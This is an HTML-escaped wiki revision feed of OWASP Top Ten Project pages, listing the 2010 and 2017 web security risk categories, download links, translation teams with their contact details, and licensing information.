&amp;lt;div style=&amp;quot;width:100%;height:160px;border:0,margin:0;overflow: hidden;&amp;quot;&amp;gt;[[File:OWASP_Project_Header.jpg|link=]]&amp;lt;/div&amp;gt;&lt;br /&gt;
&lt;br /&gt;
On April 19, 2010 the final version of the OWASP Top 10 for 2010 was released, and here is the associated [[OWASPTop10-2010-PressRelease|press release]]. This version was updated based on numerous comments received during the comment period after the release candidate was released in Nov. 2009. &lt;br /&gt;
&lt;br /&gt;
*[https://storage.googleapis.com/google-code-archive-downloads/v2/code.google.com/owasptop10/OWASP%20Top%2010%20-%202010.pdf OWASP Top 10 - 2010 Document] &lt;br /&gt;
*[[Top 10 2010|OWASP Top 10 - 2010 - wiki]] &lt;br /&gt;
*[https://storage.googleapis.com/google-code-archive-downloads/v2/code.google.com/owasptop10/OWASP_Top_10_-_2010%20Presentation.pptx OWASP Top 10 - 2010 Presentation]&lt;br /&gt;
*[http://blip.tv/owasp-appsec-conference-in-europe/day2_track1_1430-1505-3936900 OWASP Top 10 Video of the Presentation above - this focused alot on the Top 10 for 2010 approach, rather than the details. (From OWASP AppSec EU 2010)]&lt;br /&gt;
*[http://www.vimeo.com/9006276 OWASP Top 10 Video of this Presentation when the Top 10 for 2010 was 1st released for comment - this goes through each item in the Top 10. (From OWASP AppSec DC 2009)]&lt;br /&gt;
&lt;br /&gt;
For 2010, the OWASP Top 10 Most Critical Web Application Security Risks are: &lt;br /&gt;
&lt;br /&gt;
*[[Top_10_2010-A1|A1: Injection]]&lt;br /&gt;
*[[Top_10_2010-A2|A2: Cross-Site Scripting (XSS)]]&lt;br /&gt;
*[[Top_10_2010-A3|A3: Broken Authentication and Session Management]]&lt;br /&gt;
*[[Top_10_2010-A4|A4: Insecure Direct Object References]]&lt;br /&gt;
*[[Top_10_2010-A5|A5: Cross-Site Request Forgery (CSRF)]]&lt;br /&gt;
*[[Top_10_2010-A6|A6: Security Misconfiguration]]&lt;br /&gt;
*[[Top_10_2010-A7|A7: Insecure Cryptographic Storage]]&lt;br /&gt;
*[[Top_10_2010-A8|A8: Failure to Restrict URL Access]]&lt;br /&gt;
*[[Top_10_2010-A9|A9: Insufficient Transport Layer Protection]]&lt;br /&gt;
*[[Top_10_2010-A10|A10: Unvalidated Redirects and Forwards]]&lt;br /&gt;
&lt;br /&gt;
== Introduction ==&lt;br /&gt;
&lt;br /&gt;
The OWASP Top 10 is a powerful awareness document for web application security. It represents a broad consensus about the most critical security risks to web applications. Project members include a variety of security experts from around the world who have shared their expertise to produce this list. Versions of the 2007 were translated into English, French, Spanish, Japanese, Korean and Turkish and other languages and the 2010 version was translated into even more languages. See below for all the translated versions.&lt;br /&gt;
&lt;br /&gt;
== 2010 Versions ==&lt;br /&gt;
&lt;br /&gt;
2010 Edition: &lt;br /&gt;
&lt;br /&gt;
*[https://storage.googleapis.com/google-code-archive-downloads/v2/code.google.com/owasptop10/OWASP%20Top%2010%20-%202010.pdf OWASP Top 10 2010 - PDF] &lt;br /&gt;
*[[Top 10 2010|OWASP Top 10 2010 - wiki]]&lt;br /&gt;
&lt;br /&gt;
2010 Translations: &lt;br /&gt;
&lt;br /&gt;
*[https://www.owasp.org/images/a/a9/OWASP_Top_10_2010_Chinese_V1.0_Released.pdf OWASP Top 10 2010 - Chinese PDF / 这里下载PDF格式文档]&lt;br /&gt;
*[https://storage.googleapis.com/google-code-archive-downloads/v2/code.google.com/owasptop10/OWASP%20Top%2010%20-%202010%20French.pdf OWASP Top 10 2010 - French PDF] &lt;br /&gt;
*[[media:OWASPTop10_2010_DE_Version_1_0.pdf | OWASP Top 10 2010 - German PDF]]&lt;br /&gt;
*[https://www.owasp.org/images/c/cd/OWASP_Top_10_Heb.pdf OWASP Top 10 2010 - Hebrew PDF]&lt;br /&gt;
*[https://storage.googleapis.com/google-code-archive-downloads/v2/code.google.com/owasptop10/OWASP%20Top%2010%20-%202010%20Indonesian.pdf OWASP Top 10 2010 - Indonesian PDF]&lt;br /&gt;
*[https://www.owasp.org/images/f/f9/OWASP_Top_10_-_2010_ITA.pdf OWASP Top 10 2010 - Italian PDF]&lt;br /&gt;
*[https://storage.googleapis.com/google-code-archive-downloads/v2/code.google.com/owasptop10/OWASP%20Top%2010%20-%202010%20Japanese-A4.pdf OWASP Top 10 2010 - Japanese PDF]&lt;br /&gt;
*[https://storage.googleapis.com/google-code-archive-downloads/v2/code.google.com/owasptop10/OWASP%20Top%2010%20-%202010%20Korean.pdf OWASP Top 10 2010 - Korean PDF]&lt;br /&gt;
*[https://storage.googleapis.com/google-code-archive-downloads/v2/code.google.com/owasptop10/OWASP%20Top%2010%20-%202010%20Spanish.pdf OWASP Top 10 2010 - Spanish PDF]&lt;br /&gt;
*[https://www.owasp.org/images/8/86/OWASP_Top_10_-_2010_FINAL_%28spanish%29.pptx OWASP Top 10 2010 - Spanish PPT]&lt;br /&gt;
*[https://storage.googleapis.com/google-code-archive-downloads/v2/code.google.com/owasptop10/OWASPTop%2010%20-%202010%20Vietnamese.pdf OWASP Top 10 2010 - Vietnamese PDF]&lt;br /&gt;
&lt;br /&gt;
2010 Release Candidate: &lt;br /&gt;
&lt;br /&gt;
*[https://www.owasp.org/index.php/File:OWASP_T10_-_2010_rc1.pdf OWASP Top 10 2010 Release Candidate] &lt;br /&gt;
*[https://www.owasp.org/images/e/e1/OWASP_Top_10_RC-Public_Comments.docx OWASP Top 10 2010 Release Candidate Comments], except for one set of scanned comments [https://www.owasp.org/images/2/2e/OWASP_T10_-_2010_rc1_cmts_Kai_Jendrian.pdf which are here].&lt;br /&gt;
&lt;br /&gt;
Previous versions: &lt;br /&gt;
&lt;br /&gt;
*[https://www.owasp.org/images/e/e8/OWASP_Top_10_2007.pdf OWASP Top 10 2007 - PDF] &lt;br /&gt;
*[[Top 10 2007|OWASP Top 10 2007 - wiki]] &lt;br /&gt;
*[https://www.owasp.org/index.php/Category:OWASP_Top_Ten_Project#tab=Project_Details OWASP Top 10 2007 - PDF Translations are here] &lt;br /&gt;
*[[Top 10 2004|OWASP Top 10 2004 - wiki]]&lt;br /&gt;
&lt;br /&gt;
== Project Sponsors ==&lt;br /&gt;
&lt;br /&gt;
The OWASP Top 10 project is sponsored by {{MemberLinks|link=https://www.aspectsecurity.com|logo=Aspect_logo_owasp.jpg}}&lt;br /&gt;
&lt;br /&gt;
= Translation Efforts =&lt;br /&gt;
&lt;br /&gt;
&amp;lt;div style=&amp;quot;width:100%;height:160px;border:0,margin:0;overflow: hidden;&amp;quot;&amp;gt;[[File:OWASP_Project_Header.jpg|link=]]&amp;lt;/div&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Efforts are already underway to translate the OWASP Top 10 for 2017. NOTE: This is still a '''release candidate''' so will definitely change before it's final. To avoid rework, you might want to wait until the final is released.If you are interested in helping, please contact the members of the team for the language you are interested in contributing to, or if you don't see your language listed, please let me know you want to help and we'll form a volunteer group for your language.&lt;br /&gt;
&lt;br /&gt;
Here is the original source document for the [https://github.com/OWASP/Top10/raw/master/2017/OWASP%20Top%2010%20-%202017%20RC1-English.pptx OWASP Top 10 - 2017 '''Release Candidate''' which is in PowerPoint]. Please use this document as the basis for your translation efforts. &lt;br /&gt;
&lt;br /&gt;
2017 Release Candidate Translation Teams:&lt;br /&gt;
&lt;br /&gt;
* French: Ludovic Petit: Ludovic.Petit@owasp.org, Sébastien Gioria: Sebastien.Gioria@owasp.org. &lt;br /&gt;
* Chinese: 王颉、包悦忠、Rip、顾凌志、王厚奎、王文君、吴楠、夏天泽、夏玉明、杨天识、袁明坤、张镇(排名不分先后，按姓氏拼音排列)  [https://www.owasp.org/images/8/8f/OWASP_Top_10_2017（RC1）中文版（V1.0）.pdf OWASP Top10 2017 RC1 - Chinese PDF]&lt;br /&gt;
* Azerbaijanian: Rashad Aliyev (rashad@aliev.info)&lt;br /&gt;
* Others to be listed.&lt;br /&gt;
&lt;br /&gt;
2013 Completed Translations:&lt;br /&gt;
&lt;br /&gt;
* Arabic: [https://www.owasp.org/images/6/6a/OWASP_TOP_10_2013_Arabic.pdf OWASP Top 10 2013 - Arabic PDF]  Translated by: Mohannad Shahat: Mohannad.Shahat@owasp.org, Fahad: @SecurityArk, Abdulellah Alsaheel: cs.saheel@gmail.com, Khalifa Alshamsi: Khs1618@gmail.com and Sabri(KING SABRI): king.sabri@gmail.com, Mohammed Aldossary: mohammed.aldossary@owasp.org&lt;br /&gt;
* Chinese 2013：中文版2013 [https://www.owasp.org/images/5/51/OWASP_Top_10_2013-Chinese-V1.2.pdf OWASP Top 10 2013 - Chinese (PDF)]. 项目组长： Rip 王颉， 参与人员： 陈亮、 顾庆林、 胡晓斌、 李建蒙、 王文君、 杨天识、 张在峰&lt;br /&gt;
* Czech 2013: [https://www.owasp.org/images/f/f3/OWASP_Top_10_-_2013_Final_-_Czech_V1.1.pdf OWASP Top 10 2013 - Czech (PDF)] [https://www.owasp.org/images/0/02/OWASP_Top_10_-_2013_Final_-_Czech_V1.1.pptx OWASP Top 10 2013 - Czech (PPTX)] CSIRT.CZ - CZ.NIC, z.s.p.o. (.cz domain registry): Petr Zavodsky: petr.zavodsky@owasp.org, Vaclav Klimes, Zuzana Duracinska, Michal Prokop, Edvard Rejthar, Pavel Basta&lt;br /&gt;
*French 2013: [https://storage.googleapis.com/google-code-archive-downloads/v2/code.google.com/owasptop10/OWASP%20Top%2010%20-%202013%20-%20French.pdf OWASP Top 10 2013 - French PDF] Ludovic Petit: Ludovic.Petit@owasp.org, Sébastien Gioria: Sebastien.Gioria@owasp.org, Erwan Abgrall: g4l4drim@gmail.com, Benjamin Avet: benjamin.avet@gmail.com, Jocelyn Aubert: jocelyn.aubert@owasp.org, Damien Azambour: damien.azambourg@owasp.org, Aline Barthelemy: aline.barthelemy@fr.abb.com, Moulay Abdsamad Belghiti: abdsamad.belghiti@gmail.com, Gregory Blanc: gregory.blanc@gmail.com, Clément Capel: clement.capel@sfr.com, Etienne Capgras: Etienne.capgras@solucom.fr, Julien Cayssol: julien@aqwz.com, Antonio Fontes: antonio.fontes@owasp.org, Ely de Travieso: Ely.detravieso@owasp.org, Nicolas Grégoire: nicolas.gregoire@agarri.fr, Valérie Lasserre: valerie.lasserre@gmx.fr, Antoine Laureau: antoine.laureau@owasp.org, Guillaume Lopes: lopes.guillaume@free.fr, Gilles Morain: gilles.morain@gmail.com, Christophe Pekar: christophe.pekar@owasp.org, Olivier Perret: perrets@free.fr, Michel Prunet: michel.prunet@owasp.org, Olivier Revollat: revollat@gmail.com, Aymeric Tabourin: aymeric.tabourin@orange.com&lt;br /&gt;
* German 2013: [[media:OWASP_Top_10_2013_DE_Version_1_0.pdf | OWASP Top 10 2013 - German PDF]] top10@owasp.de which is Frank Dölitzscher, Torsten Gigler, Tobias Glemser, Dr. Ingo Hanke, Thomas Herzog, [[User:Kai_Jendrian|Kai Jendrian]], [[User:Ralf_Reinhardt|Ralf Reinhardt]], Michael Schäfer&lt;br /&gt;
* Hebrew 2013: [[OWASP_Top10_Hebrew|OWASP Top 10 2013 - Hebrew]] [https://www.owasp.org/images/1/1b/OWASP_Top_10_2013-Hebrew.pdf PDF] Translated by: Or Katz, Eyal Estrin, Oran Yitzhak, Dan Peled, Shay Sivan.&lt;br /&gt;
* Italian 2013: [https://www.owasp.org/images/c/c9/OWASP_Top_10_-_2013_-_Italiano.pdf OWASP Top 10 2013 - Italian PDF] Translated by: Michele Saporito: m.saporito7@gmail.com, Paolo Perego: thesp0nge@owasp.org, Matteo Meucci: matteo.meucci@owasp.org, Sara Gallo: sara.gallo@gmail.com, Alessandro Guido: alex@securityaddicted.com, Mirko Guido Spezie: mirko@dayu.it, Giuseppe Di Cesare: giuseppe.dicesare@alice.it, Paco Schiaffella: schiaffella@gmail.com, Gianluca Grasso: giandou@gmail.com, Alessio D'Ospina: alessiodos@gmail.com, Loredana Mancini: loredana.mancini@business-e.it, Alessio Petracca: alessio.petracca@gmail.com, Giuseppe Trotta: giutrotta@gmail.com, Simone Onofri: simone.onofri@gmail.com, Francesco Cossu: hambucker@gmail.com, Marco Lancini: marco.lancini.ml@gmail.com, Stefano Zanero: zanero@elet.polimi.it, Giovanni Schmid: giovanni.schmid@na.icar.cnr.it, Igor Falcomata': koba@sikurezza.org&lt;br /&gt;
*Japanese 2013: [https://www.owasp.org/images/7/79/OWASP_Top_10_2013_JPN.pdf OWASP Top 10 2013 - Japanese PDF] Translated by: Chia-Lung Hsieh: ryusuke.tw(at)gmail.com, Reviewed by: Hiroshi Tokumaru, Takanori Nakanowatari&lt;br /&gt;
* Korean 2013: [https://www.owasp.org/images/2/2c/OWASP_Top_10_-_2013_Final_-_Korean.pdf OWASP Top 10 2013 - Korean PDF] (이름가나다순) 김병효:byounghyo.kim@owasp.org, 김지원:jiwon.kim@owasp.or.kr, 김효근:katuri@katuri.kr, 박정훈:xelion@gmail.com, 성영모:youngmo.seong@owasp.or.kr, 성윤기:yune.sung@owasp.org, 송보영:boyoung.song@owasp.or.kr, 송창기:factor7@naver.com, 유정호:griphis77@gmail.com, 장상민:sangmin.jang@owasp.or.kr, 전영재:youngjae.jeon@owasp.org, 정가람:tgcarrot@gmail.com, 정홍순:jhs728@gmail.com, 조민재:johnny.cho@owasp.org,허성무:issimplenet@gmail.com&lt;br /&gt;
*Brazilian Portuguese 2013: [https://storage.googleapis.com/google-code-archive-downloads/v2/code.google.com/owasptop10/OWASP_Top_10_-_2013_Brazilian_Portuguese.pdf OWASP Top 10 2013 - Brazilian Portuguese PDF] Translated by: Carlos Serrão, Marcio Machry, Ícaro Evangelista de Torres, Carlo Marcelo Revoredo da Silva, Luiz Vieira, Suely Ramalho de Mello, Jorge Olímpia, Daniel Quintão, Mauro Risonho de Paula Assumpção, Marcelo Lopes, Caio Dias, Rodrigo Gularte&lt;br /&gt;
*Spanish 2013: [https://www.owasp.org/images/5/5f/OWASP_Top_10_-_2013_Final_-_Espa%C3%B1ol.pdf OWASP Top 10 2013 - Spanish PDF] Gerardo Canedo: gerardo.canedo@owasp.org, Jorge Correa: jacorream@gmail.com, Fabien Spychiger: fabien.spychiger@dreamlab.net, Alberto Hill: alberto.daniel.hill@gmail.com, Johnatan Stanley: johnatanst@gmail.com, Maximiliano Alonzo: malonzo@tib.com.uy, Mateo Martinez: mateo.martinez@owasp.org, David Montero: david.montero@owasp.org, Rodrigo Martinez: rodmart@fing.edu.uy, Guillermo Skrilec: guillermo.skrilec@owasp.org, Felipe Zipitria: felipe.zipitria@owasp.org, Fabien Spychiger: fabien.spychiger@dreamlab.net, Rafael Gil: rafael.gillarios@owasp.org, Christian Lopez: christian.lopez.martin@owasp.org, jonathan fernandez jonathan.fernandez04@gmail.com, Paola Rodriguez: Paola_R1@verifone.com, Hector Aguirre: hector.antonio.aguirre@owasp.org, Roger Carhuatocto: rcarhuatocto@intix.info, Juan Carlos Calderon: johnccr@yahoo.com, Marc Rivero López: mriverolopez@gmail.com, Carlos Allendes: carlos.allendes@owasp.org, daniel@carrero.cl: daniel@carrero.cl, Manuel Ramírez: manuel.ramirez.s@gmail.com, Marco Miranda: marco.miranda@owasp.org, Mauricio D. Papaleo Mayada: mpapaleo@gmail.com, Felipe Sanchez: felipe.sanchez@peritajesinformaticos.cl, Juan Manuel Bahamonde: juanmanuel.bahamonde@gmail.com, Adrià Massanet: adriamassanet@gmail.com, Jorge Correa: jacorream@gmail.com, Ramiro Pulgar: ramiro.pulgar@owasp.org, German Alonso Suárez Guerrero: german.suarez@owasp.org, Jose A. Guasch: jaguasch@gmail.com, Edgar Salazar: edgar.salazar@owasp.org&lt;br /&gt;
*Ukrainian 2013: [https://www.owasp.org/images/e/e3/OWASP_Top_10_-_2013_Final_Ukrainian.pdf OWASP Top 10 2013 - Ukrainian PDF] Kateryna Ovechenko, Yuriy Fedko, Gleb Paharenko, Yevgeniya Maskayeva, Sergiy Shabashkevich, Bohdan Serednytsky&lt;br /&gt;
&lt;br /&gt;
2010 Completed Translations:&lt;br /&gt;
&lt;br /&gt;
*Korean 2010: [https://storage.googleapis.com/google-code-archive-downloads/v2/code.google.com/owasptop10/OWASP%20Top%2010%20-%202010%20Korean.pdf OWASP Top 10 2010 - Korean PDF] Hyungkeun Park, (mirrk1@gmail.com)&lt;br /&gt;
*Spanish 2010: [https://storage.googleapis.com/google-code-archive-downloads/v2/code.google.com/owasptop10/OWASP%20Top%2010%20-%202010%20Spanish.pdf OWASP Top 10 2010 - Spanish PDF] *Daniel Cabezas Molina , Edgar Sanchez, Juan Carlos Calderon, Jose Antonio Guasch, Paulo Coronado, Rodrigo Marcos, Vicente Aguilera&lt;br /&gt;
*French 2010: [https://storage.googleapis.com/google-code-archive-downloads/v2/code.google.com/owasptop10/OWASP%20Top%2010%20-%202010%20French.pdf OWASP Top 10 2010 - French PDF] ludovic.petit@owasp.org, sebastien.gioria@owasp.org, antonio.fontes@owasp.org, benoit.guerette@owasp.org, Jocelyn.aubert@owasp.org, Eric.Garreau@gemalto.com, Guillaume.Huysmans@gemalto.com &lt;br /&gt;
*German: [[media:OWASPTop10_2010_DE_Version_1_0.pdf | OWASP Top 10 2010 - German PDF]] top10@owasp.de which is Frank Dölitzscher, Tobias Glemser, Dr. Ingo Hanke, [[User:Kai_Jendrian|Kai Jendrian]], [[User:Ralf_Reinhardt|Ralf Reinhardt]], Michael Schäfer&lt;br /&gt;
*Indonesian: [https://storage.googleapis.com/google-code-archive-downloads/v2/code.google.com/owasptop10/OWASP%20Top%2010%20-%202010%20Indonesian.pdf OWASP Top 10 2010 - Indonesian PDF] Tedi Heriyanto (coordinator), Lathifah Arief, Tri A Sundara, Zaki Akhmad&lt;br /&gt;
*Italian: [https://www.owasp.org/images/f/f9/OWASP_Top_10_-_2010_ITA.pdf OWASP Top 10 2010 - Italian PDF] Simone Onofri, Paolo Perego, Massimo Biagiotti, Edoardo Viscosi, Salvatore Fiorillo, Roberto Battistoni, Loredana Mancini, Michele Nesta, Paco Schiaffella, Lucilla Mancini, Gerardo Di Giacomo, Valentino Squilloni&lt;br /&gt;
*Japanese: [https://storage.googleapis.com/google-code-archive-downloads/v2/code.google.com/owasptop10/OWASP%20Top%2010%20-%202010%20Japanese-A4.pdf OWASP Top 10 2010 - Japanese PDF] cecil.su@owasp.org, Dr. Masayuki Hisada, Yoshimasa Kawamoto, Ryusuke Sakamoto, Keisuke Seki, Shin Umemoto, Takashi Arima&lt;br /&gt;
*Chinese: [https://www.owasp.org/images/a/a9/OWASP_Top_10_2010_Chinese_V1.0_Released.pdf OWASP Top 10 2010 - Chinese PDF] 感谢以下为中文版本做出贡献的翻译人员和审核人员: Rip Torn, 钟卫林, 高雯, 王颉, 于振东&lt;br /&gt;
*Vietnamese: [https://storage.googleapis.com/google-code-archive-downloads/v2/code.google.com/owasptop10/OWASPTop%2010%20-%202010%20Vietnamese.pdf OWASP Top 10 2010 - Vietnamese PDF] Translation lead by Cecil Su - Translation Team: Dang Hoang Vu, Nguyen Ba Tien, Nguyen Tang Hung, Luong Dieu Phuong, Huynh Thien Tam&lt;br /&gt;
*Hebrew: [[OWASP_Top10_Hebrew|OWASP Top 10 Hebrew Project]] -- [https://www.owasp.org/images/c/cd/OWASP_Top_10_Heb.pdf OWASP Top 10 2010 - Hebrew PDF]. Lead by Or Katz, see translation page for list of contributors.&lt;br /&gt;
&lt;br /&gt;
= Project Details =&lt;br /&gt;
&lt;br /&gt;
&amp;lt;div style=&amp;quot;width:100%;height:160px;border:0,margin:0;overflow: hidden;&amp;quot;&amp;gt;[[File:OWASP_Project_Header.jpg|link=]]&amp;lt;/div&amp;gt;&lt;br /&gt;
&lt;br /&gt;
{{:GPC_Project_Details/OWASP_Top10 | OWASP Project Identification Tab}}&lt;br /&gt;
&lt;br /&gt;
= Some Commercial &amp;amp; OWASP Uses of the Top 10 =&lt;br /&gt;
&lt;br /&gt;
&amp;lt;div style=&amp;quot;width:100%;height:160px;border:0,margin:0;overflow: hidden;&amp;quot;&amp;gt;[[File:OWASP_Project_Header.jpg|link=]]&amp;lt;/div&amp;gt;&lt;br /&gt;
&lt;br /&gt;
'''Warning''': these articles have not been rated for accuracy by OWASP. Product companies should be extremely careful about claiming to &amp;quot;cover&amp;quot; or &amp;quot;ensure compliance&amp;quot; with the OWASP Top 10. The current state-of-the-art for automated detection (scanners and static analysis) and prevention (WAF) is nowhere near sufficient to claim adequate coverage of the issues in the Top 10. Nevertheless, using the Top 10 as a simple way to communicate security to end users is effective. &lt;br /&gt;
&lt;br /&gt;
;[https://blogs.microsoft.com/microsoftsecure/2008/05/01/sdl-and-the-owasp-top-ten/ Microsoft] &lt;br /&gt;
:as a way to measure the coverage of their SDL and improve security&lt;br /&gt;
&lt;br /&gt;
;[https://www.pcisecuritystandards.org/index.shtml PCI Council] &lt;br /&gt;
:as part of the Payment Card Industry Data Security Standard (PCI DSS)&lt;br /&gt;
&lt;br /&gt;
;[http://msdn.microsoft.com/en-us/library/dd129898.aspx Microsoft] &lt;br /&gt;
:to show how &amp;quot;T10 threats are handled by the security design and test procedures of Microsoft&amp;quot;&lt;br /&gt;
&lt;br /&gt;
;[[OWASP_Top_10/Mapping_to_WHID | OWASP]]&lt;br /&gt;
:OWASP Top 10 Mapped to the Web Hacking Incident Database&lt;br /&gt;
&lt;br /&gt;
;[[OWASP_Mobile_Security_Project#tab=Top_Ten_Mobile_Risks | OWASP]]&lt;br /&gt;
:OWASP Mobile Top 10 Risks&lt;br /&gt;
&lt;br /&gt;
;[[OWASP_Top_Ten_Cheat_Sheet | OWASP]]&lt;br /&gt;
:OWASP Top 10 Cheat Sheet&lt;br /&gt;
&lt;br /&gt;
__NOTOC__ &amp;lt;headertabs /&amp;gt;&lt;br /&gt;
&lt;br /&gt;
[[Category:OWASP_Project]] [[Category:OWASP_Document]] [[Category:OWASP_Download]] [[Category:OWASP_Release_Quality_Document]][[Category:Popular]][[Category:SAMM-EG-1]]&lt;/div&gt;</summary>
		<author><name>ErezYalon</name></author>	</entry>

	<entry>
		<id>https://wiki.owasp.org/index.php?title=Category:OWASP_Top_Ten_Project&amp;diff=231501</id>
		<title>Category:OWASP Top Ten Project</title>
		<link rel="alternate" type="text/html" href="https://wiki.owasp.org/index.php?title=Category:OWASP_Top_Ten_Project&amp;diff=231501"/>
				<updated>2017-07-10T14:22:00Z</updated>
		
		<summary type="html">&lt;p&gt;ErezYalon: Added s for plural leaders&lt;/p&gt;
&lt;hr /&gt;
&lt;div&gt;=Main=&lt;br /&gt;
&amp;lt;div style=&amp;quot;width:100%;height:90px;border:0,margin:0;overflow: hidden;&amp;quot;&amp;gt;[[File: flagship_big.jpg|link=https://www.owasp.org/index.php/OWASP_Project_Stages#tab=Flagship_Projects]]&amp;lt;/div&amp;gt;&lt;br /&gt;
{| style=&amp;quot;padding: 0;margin:0;margin-top:10px;text-align:left;&amp;quot; |-&lt;br /&gt;
| valign=&amp;quot;top&amp;quot;  style=&amp;quot;border-right: 1px dotted gray;padding-right:25px;&amp;quot; |&lt;br /&gt;
&lt;br /&gt;
==OWASP Top 10 - 2017 Release Candidate ==&lt;br /&gt;
&lt;br /&gt;
The release candidate for public comment was published 10 April 2017 and can be [https://github.com/OWASP/Top10/raw/master/2017/OWASP%20Top%2010%20-%202017%20RC1-English.pdf downloaded here]. OWASP plans to release the final OWASP Top 10 - 2017 in July or August 2017 after a public comment period ending June 30, 2017.&lt;br /&gt;
&lt;br /&gt;
Constructive comments on this [https://github.com/OWASP/Top10/raw/master/2017/OWASP%20Top%2010%20-%202017%20RC1-English.pdf OWASP Top 10 - 2017 Release Candidate] should be forwarded via email to the [https://lists.owasp.org/mailman/listinfo/Owasp-topten OWASP Top 10 Project Email List]. Private comments may be sent to [mailto:vanderaj@owasp.org Andrew van der Stock]. Anonymous comments are welcome. All non-private comments will be catalogued and published at the same time as the final public release. Comments recommending changes to the Top 10 should include a complete suggested list of changes, along with a rationale for each change. All comments should indicate the specific relevant page and section.&lt;br /&gt;
&lt;br /&gt;
==OWASP Top 10 Most Critical Web Application Security Risks==&lt;br /&gt;
&lt;br /&gt;
The OWASP Top 10 is a powerful awareness document for web application security. It represents a broad consensus about the most critical security risks to web applications. Project members include a variety of security experts from around the world who have shared their expertise to produce this list.&lt;br /&gt;
&lt;br /&gt;
We urge all companies to adopt this awareness document within their organization and start the process of ensuring that their web applications minimize these risks. Adopting the OWASP Top 10 is perhaps the most effective first step towards changing the software development culture within your organization into one that produces secure code.&lt;br /&gt;
&lt;br /&gt;
==Translation Efforts==&lt;br /&gt;
&lt;br /&gt;
The OWASP Top 10 has been translated to many different languages by numerous volunteers. These translations are available as follows:&lt;br /&gt;
&lt;br /&gt;
* [[Top10#OWASP_Top_10_for_2013 | All versions of the OWASP Top 10 - 2013]]&lt;br /&gt;
* [[Top10#OWASP_Top_10_for_2010 | All versions of the OWASP Top 10 - 2010]]&lt;br /&gt;
* [[Top10#Translation_Efforts_2 | Information about the various translation teams]]&lt;br /&gt;
&lt;br /&gt;
==Licensing==&lt;br /&gt;
The OWASP Top 10 is free to use. It is licensed under the http://creativecommons.org/licenses/by-sa/3.0/ Creative Commons Attribution-ShareAlike 3.0 license, so you can copy, distribute and transmit the work, and you can adapt it, and use it commercially, but all provided that you attribute the work and if you alter, transform, or build upon this work, you may distribute the resulting work only under the same or similar license to this one.&lt;br /&gt;
&lt;br /&gt;
{{Social Media Links}}&lt;br /&gt;
| valign=&amp;quot;top&amp;quot;  style=&amp;quot;padding-left:25px;width:200px;border-right: 1px dotted gray;padding-right:25px;&amp;quot; |&lt;br /&gt;
&lt;br /&gt;
== What is the OWASP Top 10? ==&lt;br /&gt;
&lt;br /&gt;
The OWASP Top 10 provides:&lt;br /&gt;
&lt;br /&gt;
* '''A list of the 10 Most Critical Web Application Security Risks'''&lt;br /&gt;
&lt;br /&gt;
For each Risk it provides:&lt;br /&gt;
* A description&lt;br /&gt;
* Example vulnerabilities&lt;br /&gt;
* Example attacks&lt;br /&gt;
* Guidance on how to avoid&lt;br /&gt;
* References to OWASP and other related resources&lt;br /&gt;
&lt;br /&gt;
== Project Leaders ==&lt;br /&gt;
&lt;br /&gt;
* [[User:vanderaj | Andrew van der Stock]]&lt;br /&gt;
* [[User:Neil_Smithline | Neil Smithline]]&lt;br /&gt;
* [[User:T.Gigler | Torsten Gigler]]&lt;br /&gt;
&lt;br /&gt;
== Related Projects ==&lt;br /&gt;
&lt;br /&gt;
* [[OWASP_Mobile_Security_Project#Top_Ten_Mobile_Risks | OWASP Mobile Top 10 Risks]]&lt;br /&gt;
&lt;br /&gt;
* [[OWASP_Top_Ten_Cheat_Sheet | OWASP Top 10 Cheat Sheet]]&lt;br /&gt;
&lt;br /&gt;
* [[OWASP_Proactive_Controls | Top 10 Proactive Controls]]&lt;br /&gt;
&lt;br /&gt;
* [[OWASP_Top_10/Mapping_to_WHID | OWASP Top 10 Mapped to the Web Hacking Incident Database]]&lt;br /&gt;
&lt;br /&gt;
== Ohloh ==&lt;br /&gt;
&lt;br /&gt;
*https://www.ohloh.net/p/OWASP-Top-10&lt;br /&gt;
&lt;br /&gt;
| valign=&amp;quot;top&amp;quot;  style=&amp;quot;padding-left:25px;width:200px;&amp;quot; |&lt;br /&gt;
&lt;br /&gt;
== Quick Download ==&lt;br /&gt;
* [https://github.com/OWASP/Top10/raw/master/2017/OWASP%20Top%2010%20-%202017%20RC1-English.pdf OWASP Top 10 2017 Release Candidate - PDF]&lt;br /&gt;
* [[Media:OWASP_Top_10_-_2013.pdf | OWASP Top 10 2013 - PDF]]&lt;br /&gt;
* [[Top_10_2013 | OWASP Top 10 2013 - wiki]]&lt;br /&gt;
* [https://storage.googleapis.com/google-code-archive-downloads/v2/code.google.com/owasptop10/OWASP_Top-10_2013%20-%20Presentation.pptx OWASP Top 10 2013 Presentation - Covering Each Item in the Top 10 (PPTX)].&lt;br /&gt;
&lt;br /&gt;
== Email List ==&lt;br /&gt;
[https://lists.owasp.org/mailman/listinfo/Owasp-topten Project Email List]&lt;br /&gt;
&lt;br /&gt;
== News and Events ==&lt;br /&gt;
* [10 Apr 2017] OWAP Top 10 - 2017 Release Candidate Published&lt;br /&gt;
* [17 Dec 2016] OWASP Top 10 - 2017 Data Call Data Published&lt;br /&gt;
* [20 May 2016] OWASP Top 10 - 2017 Data Call Announced&lt;br /&gt;
* [12 Jun 2013] OWASP Top 10 - 2013 Final Released&lt;br /&gt;
* [Feb 2013] OWASP Top 10 - 2013 - Release Candidate Published&lt;br /&gt;
&lt;br /&gt;
==Classifications==&lt;br /&gt;
&lt;br /&gt;
   {| width=&amp;quot;200&amp;quot; cellpadding=&amp;quot;2&amp;quot;&lt;br /&gt;
   |-&lt;br /&gt;
   | align=&amp;quot;center&amp;quot; valign=&amp;quot;top&amp;quot; width=&amp;quot;50%&amp;quot; rowspan=&amp;quot;2&amp;quot;| [[File:Owasp-flagship-trans-85.png|link=https://www.owasp.org/index.php/OWASP_Project_Stages#tab=Flagship_Projects]]&lt;br /&gt;
   | align=&amp;quot;center&amp;quot; valign=&amp;quot;top&amp;quot; width=&amp;quot;50%&amp;quot;| [[File:Owasp-builders-small.png|link=]]  &lt;br /&gt;
   |-&lt;br /&gt;
   | align=&amp;quot;center&amp;quot; valign=&amp;quot;top&amp;quot; width=&amp;quot;50%&amp;quot;| [[File:Owasp-defenders-small.png|link=]]&lt;br /&gt;
   |-&lt;br /&gt;
   | colspan=&amp;quot;2&amp;quot; align=&amp;quot;center&amp;quot;  | [[File:Cc-button-y-sa-small.png|link=http://creativecommons.org/licenses/by-sa/3.0/]]&lt;br /&gt;
   |-&lt;br /&gt;
   | colspan=&amp;quot;2&amp;quot; align=&amp;quot;center&amp;quot;  | [[File:Project_Type_Files_DOC.jpg|link=]]&lt;br /&gt;
